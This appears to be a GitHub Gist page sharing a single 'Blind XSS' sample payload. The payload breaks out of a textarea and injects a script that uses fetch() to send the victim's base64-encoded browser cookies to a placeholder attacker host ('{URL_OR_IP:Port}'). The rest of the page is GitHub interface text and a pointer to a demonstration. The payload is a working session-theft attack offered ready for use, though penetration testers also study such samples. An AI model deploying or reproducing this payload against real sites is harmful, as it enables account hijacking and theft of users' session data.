Created
September 5, 2022 14:02
-
-
Save ShubhamJagtap2000/a58f8e6162f4d435e5146cccd757d0ad to your computer and use it in GitHub Desktop.
Sample payload used in Blind XSS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
</textarea><script>fetch('http://{URL_OR_IP:Port}?cookie=' + btoa(document.cookie) );</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
See execution and practical of the payload here